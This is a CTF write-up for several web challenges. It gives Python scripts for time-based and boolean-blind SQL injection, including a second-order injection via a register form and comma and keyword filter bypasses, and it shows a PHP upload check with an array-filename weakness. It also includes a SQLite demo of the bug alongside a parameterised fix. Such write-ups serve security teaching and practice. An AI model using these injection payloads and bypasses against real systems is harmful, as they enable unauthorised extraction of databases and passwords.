Opening the challenge shows a login form. A directory scan turns up register.php; registering an account and logging in shows nothing except the username, so I guessed it might be a second-order injection. I built the payload `' or (case when 1=1 then 'a' else 'b' end)='a` and it worked. The filter also blocks `information` and the comma, so without `information_schema` the table name can only be guessed as `flag`; combining that with `limit ... offset` I wrote a script to brute-force it.
```python
# -*- coding:utf8 -*-
import requests
import time

db_name = ""
url = "http://7f01519f2fe14923acb0d2a096255f7302bd502b499a47ed.game.ichunqiu.com/register.php"
database = ""
## current database name length ##
# (comment left over from an earlier probe; this loop actually reads the flag row one character at a time,
#  using mid(... from ... for ...) to avoid the filtered comma and sleep(3) as the time-based oracle)
for a in range(1, 50):
    for i in range(30, 148):
        db_payload = "' or (case when ascii(mid((select * from flag limit 1 offset 0)from(%d)for(1)))='%d' then sleep(3) else 'b' end)='a" % (a, i)
        da = {"email": "11@qq.com", "username": db_payload, "password": "11"}
        print(db_payload)
        startTime = time.time()
        r = requests.post(url, data=da, timeout=100)
        if time.time() - startTime > 2:   # delayed response: character a of the flag is chr(i)
            database += chr(i)
            print(database)
            break
print(database)
```
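To make the "second-order" part concrete, here is an added example (not code from the writeup or the challenge) that reproduces the bug pattern with an in-memory SQLite database: the registration INSERT is parameterised and stores the quote harmlessly, but a later query concatenates the stored username back into SQL, so the writeup's payload fires on the second use. The `users` schema and `profile_*` functions are constructed for illustration; the hardened version binds the stored value as a parameter.

```python
import sqlite3

# Payload from the writeup; stored verbatim at registration, it becomes SQL on the next use.
PAYLOAD = "' or (case when 1=1 then 'a' else 'b' end)='a"


def setup():
    """Constructed in-memory stand-in for the challenge database (real schema unknown)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'constructed-password')")
    return db


def register(db, username, password):
    """First use of the input: a parameterised INSERT, so the quote is stored harmlessly."""
    db.execute("INSERT INTO users VALUES (?, ?)", (username, password))


def stored_username(db, username):
    """Reads the username back out of the database, where it now looks like trusted data."""
    row = db.execute("SELECT username FROM users WHERE username = ?", (username,)).fetchone()
    return row[0]


def profile_vulnerable(db, username):
    """Second use: the stored value is concatenated into a new query (the second-order bug)."""
    sql = "SELECT username FROM users WHERE username = '%s'" % stored_username(db, username)
    return [r[0] for r in db.execute(sql)]


def profile_fixed(db, username):
    """Same lookup with the stored value bound as a parameter; it can no longer alter the query."""
    rows = db.execute("SELECT username FROM users WHERE username = ?", (stored_username(db, username),))
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = setup()
    register(db, PAYLOAD, "x")
    print(profile_vulnerable(db, PAYLOAD))  # every row: the CASE expression is true for all of them
    print(profile_fixed(db, PAYLOAD))       # only the row that was actually registered
```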
```php
if (!empty($_FILES['file'])) {
    #mime check
    # note: $_FILES['file']['type'] is the MIME type sent by the client, not derived from the content
    if (!in_array($_FILES['file']['type'], ['image/jpeg', 'image/png', 'image/gif'])) {
        die('This type is not allowed!');
    }

    #check filename
    $file = empty($_POST['filename']) ? $_FILES['file']['name'] : $_POST['filename'];
    if (!is_array($file)) {
        # only a string filename is split on '.'; an array value skips this step
        $file = explode('.', strtolower($file));
    }
    $ext = end($file);
    if (!in_array($ext, ['jpg', 'png', 'gif'])) {
        die('This file is not allowed!');
    }
```
Brute-forcing the login with admin / admin123 gets in and shows "only wuyanzu can get the flag". The WAF is `/sleep|benchmark|=|like|regexp|and|\%|substr|union|\s+|group|floor|user|extractvalue|UpdateXml|ord|lpad|rpad|left|>|,|ascii/i` !!! (trust me, no one can bypass it). A wrong username shows "username error", otherwise "passwd error", so a boolean-blind payload can be built to extract the password.
```python
import requests

# The writeup's script starts at the loop; url, st and database are assumed here so it runs.
url = "http://<challenge-host>/login.php"   # placeholder: the writeup does not give this challenge's URL
st = "abcdefghijklmnopqrstuvwxyz0123456789"  # assumed candidate character set for the password
database = ""

for a in range(1, 50):
    for i in st:
        # /**/ replaces spaces, && replaces and, in() replaces =, mid(... from ... for ...) replaces substr and the comma
        db_payload = "wuyanzu'/**/&&/**/mid(passwd/**/from/**/%d/**/for/**/1)in('%s')#" % (a, i)
        da = {"uname": db_payload, "passwd": 1, "submit": "login"}
        #print(db_payload)
        r = requests.post(url, data=da, timeout=100)
        if 'passwd' in r.text:   # "passwd error" means the username clause was true: character a is i
            database += i
            print(database)
            break
print(database)
```